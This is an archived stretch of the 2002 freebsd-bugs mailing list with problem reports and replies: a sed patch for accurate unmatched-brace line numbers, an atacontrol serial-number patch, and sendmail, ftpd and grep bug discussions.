freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Tue Jul 30 19:10:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Cyrille Lefevre >Release: FreeBSD 4.6-STABLE i386 >Organization: ACME >Environment: System: FreeBSD gits 4.6-STABLE FreeBSD 4.6-STABLE #21: Sun Jul 28 09:42:24 CEST 2002 root@gits:/disk2/freebsd/stable/src/sys/compile/CUSTOM i386 >Description: actually, sed reports the EOF linenum on pending }. this patch makes sed to report the { linenum instead. >How-To-Repeat: fetch http://queen.rett.polimi.it/~paolob/seders/scripts/sokoban.sed sed -f sokoban.sed sed: 2266: /root/sokoban.sed: unexpected EOF (pending }'s) patched version says : sed: 2063: /root/sokoban.sed: unexpected EOF (pending }'s) which is more accurate, IMHO. >Fix: Index: compile.c =================================================================== RCS file: /home/ncvs/src/usr.bin/sed/compile.c,v retrieving revision 1.21 diff -u -r1.21 compile.c --- compile.c 1 Jun 2002 13:25:47 -0000 1.21 +++ compile.c 31 Jul 2002 01:53:02 -0000 @@ -165,9 +165,12 @@ stack = 0; for (;;) { if ((p = cu_fgets(lbuf, sizeof(lbuf), NULL)) == NULL) { - if (stack != 0) + if (stack != 0) { + for (cmd = stack; cmd->next; cmd = cmd->next) + /* nothing */ ; errx(1, "%lu: %s: unexpected EOF (pending }'s)", - linenum, fname); + cmd->linenum, fname); + } return (link); } @@ -226,6 +229,7 @@ p++; EATSPACE(); cmd->next = stack; + cmd->linenum = linenum; stack = cmd; link = &cmd->u.c; if (*p) Index: defs.h =================================================================== RCS file: /home/ncvs/src/usr.bin/sed/defs.h,v retrieving revision 1.3 diff -u -r1.3 defs.h --- defs.h 11 Aug 1997 07:21:00 -0000 1.3 +++ defs.h 31 Jul 2002 01:51:04 -0000 @@ -88,6 +88,7 @@ int fd; /* File descriptor for w */ } u; char code; /* Command code */ + u_long linenum; /* Line number. */ u_int nonsel:1; /* True if ! */ u_int inrange:1; /* True if in range */ }; >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jul 30 19:30: 9 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D8D1737B401 for ; Tue, 30 Jul 2002 19:30:04 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 31D4343E6E for ; Tue, 30 Jul 2002 19:30:04 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6V2U4JU026209 for ; Tue, 30 Jul 2002 19:30:04 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6V2U4e8026208; Tue, 30 Jul 2002 19:30:04 -0700 (PDT) Date: Tue, 30 Jul 2002 19:30:04 -0700 (PDT) Message-Id: <200207310230.g6V2U4e8026208@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Semen A. Ustimenko" Subject: Re: bin/36189: [ftpd] it can not send a file on NTFS in binary correct!! Reply-To: "Semen A. Ustimenko" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/36189; it has been noted by GNATS. From: "Semen A. Ustimenko" To: Yar Tikhiy Cc: freebsd-gnats-submit@FreeBSD.org, Subject: Re: bin/36189: [ftpd] it can not send a file on NTFS in binary correct!! Date: Wed, 31 Jul 2002 09:28:05 +0700 (NOVST) Hi! Yep, this is a known problem, and duplicate bin/34072 already exist. I've commited a fix to -current. Soon it will be merged to -stable and both PRs will be closed. Sorry for taking so long. On Tue, 30 Jul 2002, Yar Tikhiy wrote: > Hi Semen, > > Could you take a look at this PR? I believe there were problems > with sendfile(2) on NTFS. > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jul 30 22:40: 7 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D8E2A37B400 for ; Tue, 30 Jul 2002 22:40:03 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 71F7643E5E for ; Tue, 30 Jul 2002 22:40:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6V5e2JU057357 for ; Tue, 30 Jul 2002 22:40:02 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6V5e2Sm057356; Tue, 30 Jul 2002 22:40:02 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1F29B37B400 for ; Tue, 30 Jul 2002 22:38:35 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id C37B443E5E for ; Tue, 30 Jul 2002 22:38:34 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g6V5cTOT096713 for ; Tue, 30 Jul 2002 22:38:29 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g6V5cTdP096712; Tue, 30 Jul 2002 22:38:29 -0700 (PDT) Message-Id: <200207310538.g6V5cTdP096712@www.freebsd.org> Date: Tue, 30 Jul 2002 22:38:29 -0700 (PDT) From: james vella To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/41192: piping to grep,results repeated 6 times Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41192 >Category: misc >Synopsis: piping to grep,results repeated 6 times >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Jul 30 22:40:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: james vella >Release: 4.6 >Organization: n/a >Environment: FreeBSD zombie.db0x.org 4.6-RELEASE FreeBSD 4.6-RELEASE #5: Fri Jul 26 14:27:24 CEST 2002 james@zombie.db0x.org:/usr/src/sys/compile/MYKERNEL i386 >Description: when i attempt to filter a dmesg command to look for a specific string ie "zombie# dmesg | grep sc0" the results get repeated 6 times >How-To-Repeat: dmesg | grep sc0 >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jul 30 22:40:12 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id F3C7837B401 for ; Tue, 30 Jul 2002 22:40:03 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id C290E43E75 for ; Tue, 30 Jul 2002 22:40:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6V5e2JU057371 for ; Tue, 30 Jul 2002 22:40:02 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6V5e25s057370; Tue, 30 Jul 2002 22:40:02 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7C42C37B400 for ; Tue, 30 Jul 2002 22:38:44 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2CAC043E5E for ; Tue, 30 Jul 2002 22:38:44 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g6V5ciOT096719 for ; Tue, 30 Jul 2002 22:38:44 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g6V5ciVN096718; Tue, 30 Jul 2002 22:38:44 -0700 (PDT) Message-Id: <200207310538.g6V5ciVN096718@www.freebsd.org> Date: Tue, 30 Jul 2002 22:38:44 -0700 (PDT) From: james vella To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/41193: piping to grep,results repeated 6 times Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41193 >Category: misc >Synopsis: piping to grep,results repeated 6 times >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Jul 30 22:40:02 PDT 2002 >Closed-Date: >Last-Modified: >Originator: james vella >Release: 4.6 >Organization: n/a >Environment: FreeBSD zombie.db0x.org 4.6-RELEASE FreeBSD 4.6-RELEASE #5: Fri Jul 26 14:27:24 CEST 2002 james@zombie.db0x.org:/usr/src/sys/compile/MYKERNEL i386 >Description: when i attempt to filter a dmesg command to look for a specific string ie "zombie# dmesg | grep sc0" the results get repeated 6 times >How-To-Repeat: dmesg | grep sc0 >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jul 30 22:50: 7 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id EBFEB37B400 for ; Tue, 30 Jul 2002 22:50:02 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4D06943E67 for ; Tue, 30 Jul 2002 22:50:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6V5o2JU058122 for ; Tue, 30 Jul 2002 22:50:02 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6V5o246058121; Tue, 30 Jul 2002 22:50:02 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BA92F37B400 for ; Tue, 30 Jul 2002 22:40:54 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id 685AD43E4A for ; Tue, 30 Jul 2002 22:40:54 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g6V5esOT096878 for ; Tue, 30 Jul 2002 22:40:54 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g6V5es2L096877; Tue, 30 Jul 2002 22:40:54 -0700 (PDT) Message-Id: <200207310540.g6V5es2L096877@www.freebsd.org> Date: Tue, 30 Jul 2002 22:40:54 -0700 (PDT) From: james vella To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/41194: sendmail starts regardless of weather it is disables in the rc.conf Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41194 >Category: misc >Synopsis: sendmail starts regardless of weather it is disables in the rc.conf >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Jul 30 22:50:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: james vella >Release: 4.6 >Organization: n/a >Environment: FreeBSD zombie.db0x.org 4.6-RELEASE FreeBSD 4.6-RELEASE #5: Fri Jul 26 14:27:24 CEST 2002 james@zombie.db0x.org:/usr/src/sys/compile/MYKERNEL i386 >Description: sendmail starts even if disables in the rc.conf >How-To-Repeat: ps -ax | grep sendmail >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jul 31 0:13:40 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7D3E537B400; Wed, 31 Jul 2002 00:13:39 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3192943E5E; Wed, 31 Jul 2002 00:13:39 -0700 (PDT) (envelope-from maxim@FreeBSD.org) Received: from freefall.freebsd.org (maxim@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6V7DdJU074932; Wed, 31 Jul 2002 00:13:39 -0700 (PDT) (envelope-from maxim@freefall.freebsd.org) Received: (from maxim@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6V7Dc2n074928; Wed, 31 Jul 2002 00:13:38 -0700 (PDT) Date: Wed, 31 Jul 2002 00:13:38 -0700 (PDT) From: Maxim Konovalov Message-Id: <200207310713.g6V7Dc2n074928@freefall.freebsd.org> To: jamesv@postmaster.co.uk, maxim@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/41193: piping to grep,results repeated 6 times Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: piping to grep,results repeated 6 times State-Changed-From-To: open->closed State-Changed-By: maxim State-Changed-When: Wed Jul 31 00:13:01 PDT 2002 State-Changed-Why: Dup of misc/41192. http://www.freebsd.org/cgi/query-pr.cgi?pr=41193 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jul 31 0:17: 2 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3F63C37B400; Wed, 31 Jul 2002 00:17:01 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id E69C643E4A; Wed, 31 Jul 2002 00:17:00 -0700 (PDT) (envelope-from maxim@FreeBSD.org) Received: from freefall.freebsd.org (maxim@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6V7H0JU075147; Wed, 31 Jul 2002 00:17:00 -0700 (PDT) (envelope-from maxim@freefall.freebsd.org) Received: (from maxim@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6V7H0DH075143; Wed, 31 Jul 2002 00:17:00 -0700 (PDT) Date: Wed, 31 Jul 2002 00:17:00 -0700 (PDT) From: Maxim Konovalov Message-Id: <200207310717.g6V7H0DH075143@freefall.freebsd.org> To: jamesv@postmaster.co.uk, maxim@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/41192: piping to grep,results repeated 6 times Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: piping to grep,results repeated 6 times State-Changed-From-To: open->closed State-Changed-By: maxim State-Changed-When: Wed Jul 31 00:15:29 PDT 2002 State-Changed-Why: Not a problem report. Please submit your questions to . http://www.freebsd.org/cgi/query-pr.cgi?pr=41192 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jul 31 0:30: 7 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 76A3837B400 for ; Wed, 31 Jul 2002 00:30:04 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2274B43E4A for ; Wed, 31 Jul 2002 00:30:04 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6V7U4JU076289 for ; Wed, 31 Jul 2002 00:30:04 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6V7U3Ok076288; Wed, 31 Jul 2002 00:30:04 -0700 (PDT) Date: Wed, 31 Jul 2002 00:30:04 -0700 (PDT) Message-Id: <200207310730.g6V7U3Ok076288@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Maxim Konovalov Subject: Re: misc/41194: sendmail starts regardless of weather it is disables in the rc.conf Reply-To: Maxim Konovalov Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR misc/41194; it has been noted by GNATS. From: Maxim Konovalov To: james vella Cc: bug-followup@FreeBSD.org Subject: Re: misc/41194: sendmail starts regardless of weather it is disables in the rc.conf Date: Wed, 31 Jul 2002 11:22:09 +0400 (MSD) Please show output: $ grep sendmail_enable /etc/rc.conf -- Maxim Konovalov, maxim@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jul 31 1: 8:42 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3ECA137B400 for ; Wed, 31 Jul 2002 01:08:40 -0700 (PDT) Received: from mail.droso.net (koala.droso.net [193.162.142.122]) by mx1.FreeBSD.org (Postfix) with ESMTP id B24D343E31 for ; Wed, 31 Jul 2002 01:08:39 -0700 (PDT) (envelope-from erwin@mail.droso.net) Received: from localhost (localhost [127.0.0.1]) by mail.droso.net (Postfix) with ESMTP id 01D3C5BC2; Wed, 31 Jul 2002 10:08:38 +0200 (CEST) Received: by mail.droso.net (Postfix, from userid 1001) id 0C1DD5BAD; Wed, 31 Jul 2002 10:08:35 +0200 (CEST) Date: Wed, 31 Jul 2002 10:08:35 +0200 From: Erwin Lansing To: Matthias Buelow Cc: Peter Pentchev , freebsd-bugs@FreeBSD.org Subject: Re: bin/41012: /etc/periodic/daily/440.status-mailq assumes sendmail Message-ID: <20020731100834.C17892@droso.net> References: <200207290740.g6T7e31g091006@freefall.freebsd.org> <3D454B81.2050405@mukappabeta.de> <20020730071817.GC2549@straylight.oblivion.bg> <3D46A85A.8090609@mukappabeta.net> <20020730150710.GA382@straylight.oblivion.bg> <3D46B2DD.6070809@mukappabeta.de> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="KsGdsel6WgEHnImy" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <3D46B2DD.6070809@mukappabeta.de>; from mkb@mukappabeta.de on Tue, Jul 30, 2002 at 05:38:05PM +0200 X-Operating-System: FreeBSD/i386 4.6-STABLE X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --KsGdsel6WgEHnImy Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Jul 30, 2002 at 05:38:05PM +0200, Matthias Buelow wrote: > option... JFYI. After I found out about periodic.conf (actually > I have to admit I didn't know about it when I sent the PR) and that > the problematic check can be switched off with it, the PR could > be closed... would be nice, tho, if the blahblah_submit_mailq thing > would be "NO" by default or the postfix port issue a message upon > installation to inform one where to look for necessary changes > (something like "have a look at periodic.conf for sendmail-specific > mailq checks" would be ok.) >=20 Which is exactly what the postfix port does. Have a look at /usr/ports/mail/postfix/pkg-message I'm not sure about other MTAs. Cheers, -erwin --=20 Erwin Lansing -- http://droso.org --KsGdsel6WgEHnImy Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE9R5sCqy9aWxUlaZARAhkMAKCKyDqVguTnFPhDylNM8kZMd6071gCeKhV8 iuOnkJWUj+wlDqIEIlw8EGY= =25qe -----END PGP SIGNATURE----- --KsGdsel6WgEHnImy-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jul 31 1:21: 9 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 817CF37B400 for ; Wed, 31 Jul 2002 01:21:06 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id C36AC43E4A for ; Wed, 31 Jul 2002 01:21:05 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6V8L5JU084776 for ; Wed, 31 Jul 2002 01:21:05 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6V8L5fM084775; Wed, 31 Jul 2002 01:21:05 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B263837B400 for ; Wed, 31 Jul 2002 01:18:44 -0700 (PDT) Received: from david.siemens.de (david.siemens.de [192.35.17.14]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8D3A843E5E for ; Wed, 31 Jul 2002 01:18:43 -0700 (PDT) (envelope-from andre.albsmeier@mchp.siemens.de) Received: from mail3.siemens.de (mail3.siemens.de [139.25.208.14]) by david.siemens.de (8.11.6/8.11.6) with ESMTP id g6V8Ifo10818 for ; Wed, 31 Jul 2002 10:18:41 +0200 (MEST) Received: from curry.mchp.siemens.de (curry.mchp.siemens.de [139.25.42.7]) by mail3.siemens.de (8.11.6/8.11.6) with ESMTP id g6V8Iew13973 for ; Wed, 31 Jul 2002 10:18:40 +0200 (MEST) Received: (from localhost) by curry.mchp.siemens.de (8.12.5/8.12.5) id g6V8IdTQ067245 for FreeBSD-gnats-submit@freebsd.org; Wed, 31 Jul 2002 10:18:39 +0200 (CEST) Message-Id: <200207310818.g6V8IdFg010076@curry.mchp.siemens.de> Date: Wed, 31 Jul 2002 10:18:39 +0200 (CEST) From: Andre Albsmeier To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/41196: [PATCH] for atacontrol to show serial number Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41196 >Category: bin >Synopsis: [PATCH] for atacontrol to show serial number >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Wed Jul 31 01:20:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Andre Albsmeier >Release: FreeBSD 4.6-STABLE i386 >Organization: >Environment: System: all FreeBSD systems I assume >Description: Sometimes (especially for warranty purposes) it would be fine to be able to retrieve the serial number for an ata device. >How-To-Repeat: Try it :-) >Fix: --- sbin/atacontrol/atacontrol.c.ORI Wed Jul 31 09:54:42 2002 +++ sbin/atacontrol/atacontrol.c Wed Jul 31 09:57:23 2002 @@ -113,6 +113,7 @@ printf("ATA/ATAPI revision %d\n", version(parm->version_major)); printf("device model %.40s\n", parm->model); printf("firmware revision %.8s\n", parm->revision); + printf("serial number %.32s\n", parm->serial); printf("cylinders %d\n", parm->cylinders); printf("heads %d\n", parm->heads); >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jul 31 2: 0:11 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 831CD37B400 for ; Wed, 31 Jul 2002 02:00:06 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 43D2443E65 for ; Wed, 31 Jul 2002 02:00:06 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6V906JU088289 for ; Wed, 31 Jul 2002 02:00:06 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6V906c1088288; Wed, 31 Jul 2002 02:00:06 -0700 (PDT) Date: Wed, 31 Jul 2002 02:00:06 -0700 (PDT) Message-Id: <200207310900.g6V906c1088288@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Maxim Konovalov Subject: Re: misc/41194: sendmail starts regardless of weather it is disables in the rc.conf Reply-To: Maxim Konovalov Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR misc/41194; it has been noted by GNATS. From: Maxim Konovalov To: James Vella Cc: bug-followup@FreeBSD.org Subject: Re: misc/41194: sendmail starts regardless of weather it is disables in the rc.conf Date: Wed, 31 Jul 2002 12:51:33 +0400 (MSD) On 08:47+0100, Jul 31, 2002, James Vella wrote: > zombie# grep sendmail_enable /etc/rc.conf > sendmail_enable="NO" > zombie# From man 8 rc.sendmail: ... sendmail_enable (str) If set to ``YES'', run the sendmail(8) daemon at system boot time. If set to ``NONE'', do not run any sendmail(8) dae- mons at system boot time. please change your settings to sendmail_enable="NONE" I am going to close this PR if you do not mind. -- Maxim Konovalov, maxim@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jul 31 2:58:12 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 154CC37B405; Wed, 31 Jul 2002 02:58:02 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id B882143E31; Wed, 31 Jul 2002 02:58:01 -0700 (PDT) (envelope-from chern@FreeBSD.org) Received: from freefall.freebsd.org (chern@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6V9w1JU098614; Wed, 31 Jul 2002 02:58:01 -0700 (PDT) (envelope-from chern@freefall.freebsd.org) Received: (from chern@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6V9w1qO098608; Wed, 31 Jul 2002 02:58:01 -0700 (PDT) Date: Wed, 31 Jul 2002 02:58:01 -0700 (PDT) From: Chern Lee Message-Id: <200207310958.g6V9w1qO098608@freefall.freebsd.org> To: pepper@mail.rockefeller.edu, chern@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/41035: http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/configtuning-configfiles.html's /var/db refs bogus? Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: 